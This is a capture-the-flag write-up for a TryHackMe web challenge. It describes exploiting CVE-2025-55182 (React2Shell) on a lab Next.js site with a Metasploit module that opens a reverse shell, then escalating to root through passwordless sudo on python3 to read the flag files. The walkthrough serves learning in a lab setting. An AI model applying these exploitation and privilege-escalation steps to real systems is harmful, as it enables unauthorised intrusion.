Corp Website
🌐 Love at First Breach 2026 - Corp Website
| Category | Author |
|---|---|
| 🌐 Web | TryHackMe |
Challenge Prompt
My Dearest Hacker,
Valentine’s Day is fast approaching, and “Romance & Co” are gearing up for their busiest season.
Behind the scenes, however, things are going wrong. Security alerts suggest that “Romance & Co” has already been compromised. Logs are incomplete, developers defensive and Shareholders want answers now!
As a security analyst, your mission is to retrace the attacker’s, uncover how the attackers exploited the vulnerabilities found on the “Romance & Co” web application and determine exactly how the breach occurred.
You can find the web application here: http://MACHINE_IP:3000
Problem Type
- Web
- React2Shell
- CVE-2025-55182
Solve
Upon visiting the page we see Romance & Co.
I started this one with a quick nmap using nmap -p 3000 -T4 -A <SITE IP>
I spent a lot of time playing with different things on the site, running FFUF, etc but I noticed this one is made with Next.js.
I decided to run nuclei with nuclei -u http://<SITE IP>:3000 to see if there were any vulnerabilities:
Jackpot! CVE-2025-55182 is React2Shell a critical RCE vulnarability.
From there I moved into Metasploit with msfconsole.
Then I ran search CVE-2025-55182 to see if there were any plug ins to exploit this and there were:
I ran use 0 to use the exploit. Then options to see what I needed to set.
I ran set RHOSTS SITE_IP, set RPORT 3000, and set LHOST MY_IP. Then I ran exploit to kick off the attack.
I was able to get a shell as the user daniel:
Since we need the user flag, I ran cd ~ to go to his home directory and then ran an ls -la and found the user.txt file. cat that file out and we get the first flag:
Then I ran a sudo -l and saw the daniel user can run python3 as root with no password:
I then used GTFO bins Python File Read to see the flag at /root/root.txt: